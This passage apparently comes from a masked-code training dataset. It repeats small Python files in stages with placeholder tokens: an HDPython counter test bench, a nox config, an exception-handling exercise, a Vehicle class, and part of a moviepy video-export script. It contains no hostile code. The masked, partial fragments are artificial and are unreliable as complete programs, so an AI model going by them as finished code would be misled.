"step-3": "<mask token>\n\n\nclass Counter_cl(v_class_master):\n\n def __init__(self):\n super().__init__()\n self.counter = v_variable(v_slv(32))\n self.counter_max = v_variable(v_slv(32))\n self.state = v_variable(v_enum(counter_state.idle))\n\n def _onPull(self):\n if self.state == counter_state.running:\n self.counter << self.counter + 1\n\n def count_to_max(self, maxValue):\n if self.state == counter_state.idle:\n self.counter << 0\n self.counter_max << maxValue\n self.state << counter_state.running\n\n def isDone(self):\n return self.state == counter_state.done\n\n def reset(self):\n if self.state == counter_state.done:\n self.state << counter_state.idle\n\n\nclass my_first_test_bench(v_entity):\n\n def __init__(self):\n super().__init__()\n self.architecture()\n\n @architecture\n def architecture(self):\n counter = v_variable(v_slv(32))\n max_cnt = v_variable(v_slv(32, 300))\n clkgen = v_create(ahe.clk_generator())\n cnt = Counter_cl()\n\n @rising_edge(clkgen.clk)\n def proc():\n counter << counter + 1\n cnt.count_to_max(max_cnt)\n if cnt.isDone():\n cnt.reset()\n end_architecture()\n\n\n<mask token>\n",
"step-4": "<mask token>\n\n\nclass counter_state(Enum):\n idle = auto()\n running = auto()\n done = auto()\n\n\nclass Counter_cl(v_class_master):\n\n def __init__(self):\n super().__init__()\n self.counter = v_variable(v_slv(32))\n self.counter_max = v_variable(v_slv(32))\n self.state = v_variable(v_enum(counter_state.idle))\n\n def _onPull(self):\n if self.state == counter_state.running:\n self.counter << self.counter + 1\n\n def count_to_max(self, maxValue):\n if self.state == counter_state.idle:\n self.counter << 0\n self.counter_max << maxValue\n self.state << counter_state.running\n\n def isDone(self):\n return self.state == counter_state.done\n\n def reset(self):\n if self.state == counter_state.done:\n self.state << counter_state.idle\n\n\nclass my_first_test_bench(v_entity):\n\n def __init__(self):\n super().__init__()\n self.architecture()\n\n @architecture\n def architecture(self):\n counter = v_variable(v_slv(32))\n max_cnt = v_variable(v_slv(32, 300))\n clkgen = v_create(ahe.clk_generator())\n cnt = Counter_cl()\n\n @rising_edge(clkgen.clk)\n def proc():\n counter << counter + 1\n cnt.count_to_max(max_cnt)\n if cnt.isDone():\n cnt.reset()\n end_architecture()\n\n\n<mask token>\nconvert_to_hdl(my_first_instance, 'myFirst')\n",
"step-5": "from HDPython import *\nimport HDPython.examples as ahe\nfrom enum import Enum, auto\n\nclass counter_state(Enum):\n idle = auto()\n running = auto()\n done = auto()\n\nclass Counter_cl(v_class_master):\n def __init__(self):\n super().__init__()\n self.counter = v_variable(v_slv(32))\n self.counter_max = v_variable(v_slv(32))\n self.state = v_variable(v_enum(counter_state.idle))\n\n def _onPull(self):\n if self.state == counter_state.running:\n self.counter << self.counter + 1\n\n def count_to_max(self, maxValue):\n if self.state == counter_state.idle:\n self.counter << 0 \n self.counter_max << maxValue\n self.state << counter_state.running\n\n def isDone(self):\n return self.state == counter_state.done\n\n def reset(self):\n if self.state == counter_state.done:\n self.state << counter_state.idle\n\nclass my_first_test_bench(v_entity):\n def __init__(self):\n super().__init__()\n self.architecture()\n\n\n @architecture\n def architecture(self):\n counter = v_variable(v_slv(32))\n max_cnt = v_variable(v_slv(32,300))\n\n\n clkgen = v_create(ahe.clk_generator())\n\n cnt = Counter_cl()\n\n\n\n @rising_edge(clkgen.clk)\n def proc():\n counter << counter + 1\n cnt.count_to_max(max_cnt)\n if cnt.isDone():\n cnt.reset()\n\n \n\n end_architecture()\n\n\nmy_first_instance = v_create(my_first_test_bench())\n\nconvert_to_hdl(my_first_instance, \"myFirst\")",
"step-ids": [
7,
8,
9,
12,
15
]
}
|
[
7,
8,
9,
12,
15
] |
<|reserved_special_token_0|>
<|reserved_special_token_1|>
<|reserved_special_token_0|>
@nox.session(python=['3.9', '3.8', '3.7', '3.6'], venv_backend='conda',
venv_params=['--use-local'])
def test(session):
"""Add tests
"""
session.install()
session.run('pytest')
<|reserved_special_token_0|>
<|reserved_special_token_1|>
<|reserved_special_token_0|>
@nox.session(python=['3.9', '3.8', '3.7', '3.6'], venv_backend='conda',
venv_params=['--use-local'])
def test(session):
"""Add tests
"""
session.install()
session.run('pytest')
@nox.session(python=['3.9', '3.8', '3.7', '3.6'])
def lint(session):
"""Lint the code with flake8.
"""
session.install('flake8')
session.run('flake8', '')
<|reserved_special_token_1|>
import nox
@nox.session(python=['3.9', '3.8', '3.7', '3.6'], venv_backend='conda',
venv_params=['--use-local'])
def test(session):
"""Add tests
"""
session.install()
session.run('pytest')
@nox.session(python=['3.9', '3.8', '3.7', '3.6'])
def lint(session):
"""Lint the code with flake8.
"""
session.install('flake8')
session.run('flake8', '')
<|reserved_special_token_1|>
import nox
@nox.session(python=["3.9", "3.8", "3.7", "3.6"], venv_backend="conda", venv_params=["--use-local"])
def test(session):
"""Add tests
"""
session.install()
session.run("pytest")
@nox.session(python=["3.9", "3.8", "3.7", "3.6"])
def lint(session):
"""Lint the code with flake8.
"""
session.install("flake8")
session.run("flake8", "")
|
flexible
|
{
"blob_id": "9aecf297ed36784d69e2be6fada31f7c1ac37500",
"index": 4778,
"step-1": "<mask token>\n",
"step-2": "<mask token>\n\n\n@nox.session(python=['3.9', '3.8', '3.7', '3.6'], venv_backend='conda',\n venv_params=['--use-local'])\ndef test(session):\n \"\"\"Add tests\n \"\"\"\n session.install()\n session.run('pytest')\n\n\n<mask token>\n",
"step-3": "<mask token>\n\n\n@nox.session(python=['3.9', '3.8', '3.7', '3.6'], venv_backend='conda',\n venv_params=['--use-local'])\ndef test(session):\n \"\"\"Add tests\n \"\"\"\n session.install()\n session.run('pytest')\n\n\n@nox.session(python=['3.9', '3.8', '3.7', '3.6'])\ndef lint(session):\n \"\"\"Lint the code with flake8.\n \"\"\"\n session.install('flake8')\n session.run('flake8', '')\n",
"step-4": "import nox\n\n\n@nox.session(python=['3.9', '3.8', '3.7', '3.6'], venv_backend='conda',\n venv_params=['--use-local'])\ndef test(session):\n \"\"\"Add tests\n \"\"\"\n session.install()\n session.run('pytest')\n\n\n@nox.session(python=['3.9', '3.8', '3.7', '3.6'])\ndef lint(session):\n \"\"\"Lint the code with flake8.\n \"\"\"\n session.install('flake8')\n session.run('flake8', '')\n",
"step-5": "import nox\n\n@nox.session(python=[\"3.9\", \"3.8\", \"3.7\", \"3.6\"], venv_backend=\"conda\", venv_params=[\"--use-local\"])\ndef test(session):\n \"\"\"Add tests\n \"\"\"\n session.install()\n session.run(\"pytest\")\n\n@nox.session(python=[\"3.9\", \"3.8\", \"3.7\", \"3.6\"])\ndef lint(session):\n \"\"\"Lint the code with flake8.\n \"\"\"\n session.install(\"flake8\")\n session.run(\"flake8\", \"\")\n",
"step-ids": [
0,
1,
2,
3,
4
]
}
|
[
0,
1,
2,
3,
4
] |
#-*- coding: utf-8 -*-
s = "123"
try:
print(int(s) + 1)
print(int(s) / 1)
except ValueError as ve:
print("ValueError occurs!!!", ve)
except ZeroDivisionError as e:
print("ValueError occurs!!!", e)
except :
print("Error occurs!!!")
else:
print("elseeeeeeeeeeeeeee")
finally:
print("ABCDEFG")
# try:
# # 예외 발생 가능 코드들
# except:
# # 예외시 처리될 구문
# except:
# pass #씹겠다?!
# else:
# #예외가 없을 경우 실행되는 부분
# finally:
# #예외가 있던 없던 실행되는 부분
|
normal
|
{
"blob_id": "1bf79319613ca1454f3a9ed21068bd899616395c",
"index": 624,
"step-1": "<mask token>\n",
"step-2": "<mask token>\ntry:\n print(int(s) + 1)\n print(int(s) / 1)\nexcept ValueError as ve:\n print('ValueError occurs!!!', ve)\nexcept ZeroDivisionError as e:\n print('ValueError occurs!!!', e)\nexcept:\n print('Error occurs!!!')\nelse:\n print('elseeeeeeeeeeeeeee')\nfinally:\n print('ABCDEFG')\n",
"step-3": "s = '123'\ntry:\n print(int(s) + 1)\n print(int(s) / 1)\nexcept ValueError as ve:\n print('ValueError occurs!!!', ve)\nexcept ZeroDivisionError as e:\n print('ValueError occurs!!!', e)\nexcept:\n print('Error occurs!!!')\nelse:\n print('elseeeeeeeeeeeeeee')\nfinally:\n print('ABCDEFG')\n",
"step-4": "#-*- coding: utf-8 -*-\ns = \"123\"\n\ntry:\n print(int(s) + 1)\n print(int(s) / 1)\n\nexcept ValueError as ve:\n print(\"ValueError occurs!!!\", ve)\n\nexcept ZeroDivisionError as e:\n print(\"ValueError occurs!!!\", e)\n\nexcept :\n print(\"Error occurs!!!\")\n\nelse:\n print(\"elseeeeeeeeeeeeeee\")\n\nfinally:\n print(\"ABCDEFG\")\n\n# try:\n# # 예외 발생 가능 코드들\n# except:\n# # 예외시 처리될 구문\n# except:\n# pass #씹겠다?!\n# else:\n# #예외가 없을 경우 실행되는 부분\n\n# finally:\n# #예외가 있던 없던 실행되는 부분",
"step-5": null,
"step-ids": [
0,
1,
2,
3
]
}
|
[
0,
1,
2,
3
] |
class Vehicle(object):
count_list = []
def __init__(self, registration_number):
self.registration_number = registration_number
Vehicle.count_list.append(self)
Vehicle.count = len(Vehicle.count_list)
|
normal
|
{
"blob_id": "8b9336113f64a88eeabe6e45021938fac9efd1c6",
"index": 6442,
"step-1": "<mask token>\n",
"step-2": "class Vehicle(object):\n <mask token>\n <mask token>\n",
"step-3": "class Vehicle(object):\n <mask token>\n\n def __init__(self, registration_number):\n self.registration_number = registration_number\n Vehicle.count_list.append(self)\n Vehicle.count = len(Vehicle.count_list)\n",
"step-4": "class Vehicle(object):\n count_list = []\n\n def __init__(self, registration_number):\n self.registration_number = registration_number\n Vehicle.count_list.append(self)\n Vehicle.count = len(Vehicle.count_list)\n",
"step-5": null,
"step-ids": [
0,
1,
2,
3
]
}
|
[
0,
1,
2,
3
] |
import argparse
import glob
import importlib
import inspect
import math
import os
import re
import subprocess
import sys
import moviepy.audio.fx.all as afx
import moviepy.video.fx.all as vfx
import numpy as np
from _appmanager import get_executable
from _shutil import format_time, get_time_str, getch, print2
from moviepy.config import change_settings
from moviepy.editor import *
from open_with.open_with import open_with
import codeapi
import core
import coreapi
import datastruct
SCRIPT_ROOT = os.path.dirname(os.path.abspath(__file__))
ignore_undefined = False
if 1:
change_settings({"FFMPEG_BINARY": get_executable("ffmpeg")})
# def _get_markers(file):
# marker_file = file + ".marker.txt"
# if os.path.exists(marker_file):
# with open(marker_file, "r") as f:
# s = f.read()
# return [float(x) for x in s.split()]
# else:
# return None
# def _load_and_expand_img(f):
# fg = Image.open(f).convert("RGBA")
# bg = Image.new("RGB", (1920, 1080))
# bg.paste(fg, ((bg.width - fg.width) // 2, (bg.height - fg.height) // 2), fg)
# return np.array(bg)
def _update_mpy_clip(
clip, subclip, speed, frame, norm, loop, duration, pos, scale, vol, **kwargs,
):
assert duration is not None
# video clip operations / fx
if subclip is not None:
if isinstance(subclip, (int, float)):
clip = clip.subclip(subclip).set_duration(duration)
else:
subclip_duration = subclip[1] - subclip[0]
if duration > subclip_duration:
c1 = clip.subclip(subclip[0], subclip[1])
c2 = clip.to_ImageClip(subclip[1]).set_duration(
duration - subclip_duration
)
clip = concatenate_videoclips([c1, c2])
# HACK: workaround for a bug: 'CompositeAudioClip' object has no attribute 'fps'
if clip.audio is not None:
clip = clip.set_audio(clip.audio.set_fps(44100))
else:
clip = clip.subclip(subclip[0], subclip[1]).set_duration(duration)
if speed is not None:
clip = clip.fx(
# pylint: disable=maybe-no-member
vfx.speedx,
speed,
)
if frame is not None:
clip = clip.to_ImageClip(frame).set_duration(duration)
# Loop or change duration
if loop:
clip = clip.fx(
# pylint: disable=maybe-no-member
vfx.loop
)
if subclip is None:
clip = clip.set_duration(duration)
if pos is not None:
# (x, y) marks the center location of the of the clip instead of the top
# left corner.
if pos == "center":
clip = clip.set_position(("center", "center"))
elif isinstance(pos, (list, tuple)):
pos = list(pos)
half_size = [x // 2 for x in clip.size]
for i in range(2):
if isinstance(pos[i], (int, float)):
pos[i] = pos[i] - half_size[i]
pos[i] = int(coreapi.global_scale * pos[i])
clip = clip.set_position(pos)
else:
clip = clip.set_position(pos)
if scale[0] != 1.0 or scale[1] != 1.0:
clip = clip.resize((int(clip.w * scale[0]), int(clip.h * scale[1])))
return clip
def _update_clip_duration(track):
def is_connected(prev_clip, cur_clip):
return math.isclose(
prev_clip.start + prev_clip.duration, cur_clip.start, rel_tol=1e-3,
)
prev_clip_info = None
for clip_info in track:
if prev_clip_info is not None:
if prev_clip_info.auto_extend:
prev_clip_info.duration = clip_info.start - prev_clip_info.start
prev_clip_info.auto_extend = False
assert prev_clip_info.duration > 0
# Apply fadeout to previous clip if it's not connected with
# current clip.
if prev_clip_info.crossfade > 0 and not is_connected(
prev_clip_info, clip_info
):
prev_clip_info.fadeout = prev_clip_info.crossfade
prev_clip_info = clip_info
# Update last clip duration
if prev_clip_info is not None:
if prev_clip_info.auto_extend:
duration = prev_clip_info.duration
# Extend the last video clip to match the voice track
if "re" in coreapi.pos_dict:
duration = max(duration, coreapi.pos_dict["re"] - clip_info.start)
prev_clip_info.duration = duration
prev_clip_info.auto_extend = False
if prev_clip_info.crossfade > 0:
prev_clip_info.fadeout = prev_clip_info.crossfade
def _export_video(*, resolution, audio_only):
resolution = [int(x * coreapi.global_scale) for x in resolution]
audio_clips = []
# Update clip duration for each track
for track in datastruct.video_tracks.values():
_update_clip_duration(track)
# TODO: post-process video track clips
# Update MoviePy clip object in each track.
video_clips = []
for track_name, track in datastruct.video_tracks.items():
for i, clip_info in enumerate(track):
assert clip_info.mpy_clip is not None
assert clip_info.duration is not None
# Unlink audio clip from video clip (adjust audio duration)
if clip_info.no_audio:
clip_info.mpy_clip = clip_info.mpy_clip.set_audio(None)
elif clip_info.mpy_clip.audio is not None:
audio_clip = clip_info.mpy_clip.audio
clip_info.mpy_clip = clip_info.mpy_clip.set_audio(None)
# Audio timing
# TODO: audio subclip
if clip_info.subclip is not None:
duration = clip_info.subclip[1] - clip_info.subclip[0]
audio_clip = audio_clip.subclip(
clip_info.subclip[0], clip_info.subclip[1]
)
else:
duration = clip_info.duration
duration = min(duration, audio_clip.duration)
audio_clip = audio_clip.set_duration(duration)
audio_clip = audio_clip.set_start(clip_info.start)
# Adjust volume
if clip_info.norm:
audio_clip = audio_clip.fx(
# pylint: disable=maybe-no-member
afx.audio_normalize
)
if clip_info.vol is not None:
if isinstance(clip_info.vol, (int, float)):
audio_clip = audio_clip.fx(
# pylint: disable=maybe-no-member
afx.volumex,
clip_info.vol,
)
else:
audio_clip = _adjust_mpy_audio_clip_volume(
audio_clip, clip_info.vol
)
audio_clips.append(audio_clip)
# If the next clip has crossfade enabled
crossfade_duration = track[i + 1].crossfade if (i < len(track) - 1) else 0
if crossfade_duration:
# clip_info.fadeout = crossfade_duration # Fadeout current clip
clip_info.duration += crossfade_duration
clip_info.mpy_clip = _update_mpy_clip(clip_info.mpy_clip, **vars(clip_info))
# Deal with video fade in / out / crossfade
if clip_info.fadein:
assert isinstance(clip_info.fadein, (int, float))
# TODO: crossfadein and crossfadeout is very slow in moviepy
if track_name != "vid":
clip_info.mpy_clip = clip_info.mpy_clip.crossfadein(
clip_info.fadein
)
else:
clip_info.mpy_clip = clip_info.mpy_clip.fx(
# pylint: disable=maybe-no-member
vfx.fadein,
clip_info.fadein,
)
elif (
clip_info.crossfade > 0
): # crossfade and fadein should not happen at the same time
video_clips.append(
clip_info.mpy_clip.set_duration(clip_info.crossfade)
.crossfadein(clip_info.crossfade)
.set_start(clip_info.start)
)
clip_info.mpy_clip = clip_info.mpy_clip.subclip(clip_info.crossfade)
clip_info.start += clip_info.crossfade
if clip_info.fadeout:
assert isinstance(clip_info.fadeout, (int, float))
if track_name != "vid":
# pylint: disable=maybe-no-member
clip_info.mpy_clip = clip_info.mpy_clip.crossfadeout(
clip_info.fadeout
)
else:
clip_info.mpy_clip = clip_info.mpy_clip.fx(
# pylint: disable=maybe-no-member
vfx.fadeout,
clip_info.fadeout,
)
video_clips.append(clip_info.mpy_clip.set_start(clip_info.start))
if len(video_clips) == 0:
video_clips.append(ColorClip((200, 200), color=(0, 1, 0)).set_duration(2))
# raise Exception("no video clips??")
final_clip = CompositeVideoClip(video_clips, size=resolution)
# Resize here is too late, does not speed up the video encoding at all.
# final_clip = final_clip.resize(width=480)
# Deal with audio clips
for _, track in datastruct.audio_tracks.items():
clips = []
for clip_info in track.clips:
if clip_info.loop:
# HACK: reload the clip.
#
# still don't know why using loaded mpy_clip directly will cause
# "IndexError: index -200001 is out of bounds for axis 0 with
# size 0"...
clip = AudioFileClip(clip_info.file, buffersize=400000)
else:
clip = clip_info.mpy_clip
if clip_info.subclip is not None:
clip = clip.subclip(clip_info.subclip[0], clip_info.subclip[1])
duration = clip_info.duration
if duration is not None:
if clip_info.loop:
# pylint: disable=maybe-no-member
clip = clip.fx(afx.audio_loop, duration=duration)
else:
duration = min(duration, clip.duration)
if clip_info.subclip:
duration = min(
duration, clip_info.subclip[1] - clip_info.subclip[0]
)
clip = clip.set_duration(duration)
if clip_info.start is not None:
clip = clip.set_start(clip_info.start)
# Adjust volume by keypoints
if len(clip_info.vol_keypoints) > 0:
clip = _adjust_mpy_audio_clip_volume(clip, clip_info.vol_keypoints)
clips.append(clip)
if len(clips) > 0:
clip = CompositeAudioClip(clips)
audio_clips.append(clip)
if final_clip.audio:
audio_clips.append(final_clip.audio)
if len(audio_clips) > 0:
final_audio_clip = CompositeAudioClip(audio_clips)
# XXX: Workaround for exception: 'CompositeAudioClip' object has no attribute 'fps'.
# See: https://github.com/Zulko/moviepy/issues/863
# final_audio_clip.fps = 44100
final_clip = final_clip.set_audio(final_audio_clip)
# final_clip.show(10.5, interactive=True)
os.makedirs("tmp/out", exist_ok=True)
if audio_only:
final_audio_clip.fps = 44100
final_audio_clip.write_audiofile("%s.mp3" % out_filename)
open_with("%s.mp3" % out_filename, program_id=0)
else:
final_clip.write_videofile(
"%s.mp4" % out_filename,
temp_audiofile="%s.mp3" % out_filename,
remove_temp=False,
codec="libx264",
threads=8,
fps=coreapi.FPS,
ffmpeg_params=["-crf", "19"],
)
subprocess.Popen(
["mpv", "--force-window", "--geometry=1920x1080", f"{out_filename}.mp4"],
close_fds=True,
)
def _adjust_mpy_audio_clip_volume(clip, vol_keypoints):
xp = []
fp = []
print("vol_keypoints:", vol_keypoints)
for (p, vol) in vol_keypoints:
if isinstance(vol, (int, float)):
xp.append(p)
fp.append(vol)
else:
raise Exception("unsupported bgm parameter type:" % type(vol))
def volume_adjust(gf, t):
factor = np.interp(t, xp, fp)
factor = np.vstack([factor, factor]).T
return factor * gf(t)
return clip.fl(volume_adjust)
# def _export_srt():
# with open("out.srt", "w", encoding="utf-8") as f:
# f.write("\n".join(_srt_lines))
def _convert_to_readable_time(seconds):
seconds = int(seconds)
seconds = seconds % (24 * 3600)
hour = seconds // 3600
seconds %= 3600
minutes = seconds // 60
seconds %= 60
if hour > 0:
return "%d:%02d:%02d" % (hour, minutes, seconds)
else:
return "%02d:%02d" % (minutes, seconds)
def _write_timestamp(t, section_name):
os.makedirs(os.path.dirname(out_filename), exist_ok=True)
if not hasattr(_write_timestamp, "f"):
_write_timestamp.f = open("%s.txt" % out_filename, "w", encoding="utf-8")
_write_timestamp.f.write("%s (%s)\n" % (section_name, _convert_to_readable_time(t)))
_write_timestamp.f.flush()
@core.api
def include(file):
with open(file, "r", encoding="utf-8") as f:
s = f.read()
cwd = os.getcwd()
os.chdir(os.path.dirname(os.path.abspath(file)))
_parse_text(s)
os.chdir(cwd)
def _remove_unused_recordings(s):
used_recordings = set()
unused_recordings = []
apis = {"record": (lambda f, **kargs: used_recordings.add(f))}
_parse_text(s, apis=apis)
files = [f for f in glob.glob("record/*") if os.path.isfile(f)]
files = [f.replace("\\", "/") for f in files]
for f in files:
if f not in used_recordings:
unused_recordings.append(f)
print2("Used : %d" % len(used_recordings), color="green")
print2("Unused : %d" % len(unused_recordings), color="red")
assert len(used_recordings) + len(unused_recordings) == len(files)
print("Press y to clean up: ", end="", flush=True)
if getch() == "y":
for f in unused_recordings:
try:
os.remove(f)
except:
print("WARNING: failed to remove: %s" % f)
def _parse_text(text, apis=core.apis, **kwargs):
def find_next(text, needle, p):
pos = text.find(needle, p)
if pos < 0:
pos = len(text)
return pos
# Remove all comments
text = re.sub(r"<!--[\d\D]*?-->", "", text)
p = 0 # Current position
while p < len(text):
if text[p : p + 2] == "{{":
end = find_next(text, "}}", p)
python_code = text[p + 2 : end].strip()
p = end + 2
if ignore_undefined:
try:
exec(python_code, apis)
except NameError: # API is not defined
pass # simply ignore
else:
exec(python_code, apis)
continue
if text[p : p + 1] == "#":
end = find_next(text, "\n", p)
line = text[p:end].strip()
_write_timestamp(coreapi.pos_dict["a"], line)
p = end + 1
continue
match = re.match("---((?:[0-9]*[.])?[0-9]+)?\n", text[p:])
if match is not None:
if match.group(1) is not None:
coreapi.audio_gap(float(match.group(1)))
else:
coreapi.audio_gap(0.2)
p += match.end(0) + 1
continue
# Parse regular text
end = find_next(text, "\n", p)
line = text[p:end].strip()
p = end + 1
if line != "" and "parse_line" in apis:
apis["parse_line"](line)
# Call it at the end
core.on_api_func(None)
def _show_stats(s):
TIME_PER_CHAR = 0.1334154351395731
total = 0
def parse_line(line):
nonlocal total
total += len(line)
_parse_text(s, apis={"parse_line": parse_line}, ignore_undefined=True)
total_secs = TIME_PER_CHAR * total
print("Estimated Time: %s" % format_time(total_secs))
input()
def load_config():
import yaml
CONFIG_FILE = "config.yaml"
DEFAULT_CONFIG = {"fps": 30}
if os.path.exists(CONFIG_FILE):
with open(CONFIG_FILE, "r") as f:
config = yaml.load(f.read(), Loader=yaml.FullLoader)
else:
with open(CONFIG_FILE, "w", newline="\n") as f:
yaml.dump(DEFAULT_CONFIG, f, default_flow_style=False)
config = DEFAULT_CONFIG
coreapi.fps(config["fps"])
if __name__ == "__main__":
out_filename = "tmp/out/" + get_time_str()
parser = argparse.ArgumentParser()
parser.add_argument("--stdin", default=False, action="store_true")
parser.add_argument("--proj_dir", type=str, default=None)
parser.add_argument("-i", "--input", type=str, default=None)
parser.add_argument("-a", "--audio_only", action="store_true", default=False)
parser.add_argument(
"--remove_unused_recordings", action="store_true", default=False
)
parser.add_argument("--show_stats", action="store_true", default=False)
parser.add_argument("--preview", action="store_true", default=False)
args = parser.parse_args()
if args.proj_dir is not None:
os.chdir(args.proj_dir)
elif args.input:
os.chdir(os.path.dirname(args.input))
print("Project dir: %s" % os.getcwd())
# Load custom APIs (api.py) if exists
if os.path.exists("api.py"):
sys.path.append(os.getcwd())
mymodule = importlib.import_module("api")
global_functions = inspect.getmembers(mymodule, inspect.isfunction)
core.apis.update({k: v for k, v in global_functions})
# HACK
if args.audio_only:
coreapi.audio_only()
# Read text
if args.stdin:
s = sys.stdin.read()
elif args.input:
with open(args.input, "r", encoding="utf-8") as f:
s = f.read()
else:
raise Exception("Either --stdin or --input should be specified.")
load_config()
if args.preview:
coreapi.preview()
if args.remove_unused_recordings:
ignore_undefined = True
_remove_unused_recordings(s)
elif args.show_stats:
ignore_undefined = True
_show_stats(s)
else:
_parse_text(s, apis=core.apis)
_export_video(resolution=(1920, 1080), audio_only=args.audio_only)
|
normal
|
{
"blob_id": "9e21a39358d97633b49ad83805990c29c19a80ed",
"index": 8599,
"step-1": "<mask token>\n\n\ndef _update_mpy_clip(clip, subclip, speed, frame, norm, loop, duration, pos,\n scale, vol, **kwargs):\n assert duration is not None\n if subclip is not None:\n if isinstance(subclip, (int, float)):\n clip = clip.subclip(subclip).set_duration(duration)\n else:\n subclip_duration = subclip[1] - subclip[0]\n if duration > subclip_duration:\n c1 = clip.subclip(subclip[0], subclip[1])\n c2 = clip.to_ImageClip(subclip[1]).set_duration(duration -\n subclip_duration)\n clip = concatenate_videoclips([c1, c2])\n if clip.audio is not None:\n clip = clip.set_audio(clip.audio.set_fps(44100))\n else:\n clip = clip.subclip(subclip[0], subclip[1]).set_duration(\n duration)\n if speed is not None:\n clip = clip.fx(vfx.speedx, speed)\n if frame is not None:\n clip = clip.to_ImageClip(frame).set_duration(duration)\n if loop:\n clip = clip.fx(vfx.loop)\n if subclip is None:\n clip = clip.set_duration(duration)\n if pos is not None:\n if pos == 'center':\n clip = clip.set_position(('center', 'center'))\n elif isinstance(pos, (list, tuple)):\n pos = list(pos)\n half_size = [(x // 2) for x in clip.size]\n for i in range(2):\n if isinstance(pos[i], (int, float)):\n pos[i] = pos[i] - half_size[i]\n pos[i] = int(coreapi.global_scale * pos[i])\n clip = clip.set_position(pos)\n else:\n clip = clip.set_position(pos)\n if scale[0] != 1.0 or scale[1] != 1.0:\n clip = clip.resize((int(clip.w * scale[0]), int(clip.h * scale[1])))\n return clip\n\n\ndef _update_clip_duration(track):\n\n def is_connected(prev_clip, cur_clip):\n return math.isclose(prev_clip.start + prev_clip.duration, cur_clip.\n start, rel_tol=0.001)\n prev_clip_info = None\n for clip_info in track:\n if prev_clip_info is not None:\n if prev_clip_info.auto_extend:\n prev_clip_info.duration = (clip_info.start - prev_clip_info\n .start)\n prev_clip_info.auto_extend = False\n assert prev_clip_info.duration > 0\n if prev_clip_info.crossfade > 0 and not is_connected(prev_clip_info\n , clip_info):\n prev_clip_info.fadeout = prev_clip_info.crossfade\n prev_clip_info = clip_info\n if prev_clip_info is not None:\n if prev_clip_info.auto_extend:\n duration = prev_clip_info.duration\n if 're' in coreapi.pos_dict:\n duration = max(duration, coreapi.pos_dict['re'] - clip_info\n .start)\n prev_clip_info.duration = duration\n prev_clip_info.auto_extend = False\n if prev_clip_info.crossfade > 0:\n prev_clip_info.fadeout = prev_clip_info.crossfade\n\n\ndef _export_video(*, resolution, audio_only):\n resolution = [int(x * coreapi.global_scale) for x in resolution]\n audio_clips = []\n for track in datastruct.video_tracks.values():\n _update_clip_duration(track)\n video_clips = []\n for track_name, track in datastruct.video_tracks.items():\n for i, clip_info in enumerate(track):\n assert clip_info.mpy_clip is not None\n assert clip_info.duration is not None\n if clip_info.no_audio:\n clip_info.mpy_clip = clip_info.mpy_clip.set_audio(None)\n elif clip_info.mpy_clip.audio is not None:\n audio_clip = clip_info.mpy_clip.audio\n clip_info.mpy_clip = clip_info.mpy_clip.set_audio(None)\n if clip_info.subclip is not None:\n duration = clip_info.subclip[1] - clip_info.subclip[0]\n audio_clip = audio_clip.subclip(clip_info.subclip[0],\n clip_info.subclip[1])\n else:\n duration = clip_info.duration\n duration = min(duration, audio_clip.duration)\n audio_clip = audio_clip.set_duration(duration)\n audio_clip = audio_clip.set_start(clip_info.start)\n if clip_info.norm:\n audio_clip = audio_clip.fx(afx.audio_normalize)\n if clip_info.vol is not None:\n if isinstance(clip_info.vol, (int, float)):\n audio_clip = audio_clip.fx(afx.volumex, clip_info.vol)\n else:\n audio_clip = _adjust_mpy_audio_clip_volume(audio_clip,\n clip_info.vol)\n audio_clips.append(audio_clip)\n crossfade_duration = track[i + 1].crossfade if i < len(track\n ) - 1 else 0\n if crossfade_duration:\n clip_info.duration += crossfade_duration\n clip_info.mpy_clip = _update_mpy_clip(clip_info.mpy_clip, **\n vars(clip_info))\n if clip_info.fadein:\n assert isinstance(clip_info.fadein, (int, float))\n if track_name != 'vid':\n clip_info.mpy_clip = clip_info.mpy_clip.crossfadein(\n clip_info.fadein)\n else:\n clip_info.mpy_clip = clip_info.mpy_clip.fx(vfx.fadein,\n clip_info.fadein)\n elif clip_info.crossfade > 0:\n video_clips.append(clip_info.mpy_clip.set_duration(\n clip_info.crossfade).crossfadein(clip_info.crossfade).\n set_start(clip_info.start))\n clip_info.mpy_clip = clip_info.mpy_clip.subclip(clip_info.\n crossfade)\n clip_info.start += clip_info.crossfade\n if clip_info.fadeout:\n assert isinstance(clip_info.fadeout, (int, float))\n if track_name != 'vid':\n clip_info.mpy_clip = clip_info.mpy_clip.crossfadeout(\n clip_info.fadeout)\n else:\n clip_info.mpy_clip = clip_info.mpy_clip.fx(vfx.fadeout,\n clip_info.fadeout)\n video_clips.append(clip_info.mpy_clip.set_start(clip_info.start))\n if len(video_clips) == 0:\n video_clips.append(ColorClip((200, 200), color=(0, 1, 0)).\n set_duration(2))\n final_clip = CompositeVideoClip(video_clips, size=resolution)\n for _, track in datastruct.audio_tracks.items():\n clips = []\n for clip_info in track.clips:\n if clip_info.loop:\n clip = AudioFileClip(clip_info.file, buffersize=400000)\n else:\n clip = clip_info.mpy_clip\n if clip_info.subclip is not None:\n clip = clip.subclip(clip_info.subclip[0], clip_info.subclip[1])\n duration = clip_info.duration\n if duration is not None:\n if clip_info.loop:\n clip = clip.fx(afx.audio_loop, duration=duration)\n else:\n duration = min(duration, clip.duration)\n if clip_info.subclip:\n duration = min(duration, clip_info.subclip[1] -\n clip_info.subclip[0])\n clip = clip.set_duration(duration)\n if clip_info.start is not None:\n clip = clip.set_start(clip_info.start)\n if len(clip_info.vol_keypoints) > 0:\n clip = _adjust_mpy_audio_clip_volume(clip, clip_info.\n vol_keypoints)\n clips.append(clip)\n if len(clips) > 0:\n clip = CompositeAudioClip(clips)\n audio_clips.append(clip)\n if final_clip.audio:\n audio_clips.append(final_clip.audio)\n if len(audio_clips) > 0:\n final_audio_clip = CompositeAudioClip(audio_clips)\n final_clip = final_clip.set_audio(final_audio_clip)\n os.makedirs('tmp/out', exist_ok=True)\n if audio_only:\n final_audio_clip.fps = 44100\n final_audio_clip.write_audiofile('%s.mp3' % out_filename)\n open_with('%s.mp3' % out_filename, program_id=0)\n else:\n final_clip.write_videofile('%s.mp4' % out_filename, temp_audiofile=\n '%s.mp3' % out_filename, remove_temp=False, codec='libx264',\n threads=8, fps=coreapi.FPS, ffmpeg_params=['-crf', '19'])\n subprocess.Popen(['mpv', '--force-window', '--geometry=1920x1080',\n f'{out_filename}.mp4'], close_fds=True)\n\n\n<mask token>\n\n\ndef _convert_to_readable_time(seconds):\n seconds = int(seconds)\n seconds = seconds % (24 * 3600)\n hour = seconds // 3600\n seconds %= 3600\n minutes = seconds // 60\n seconds %= 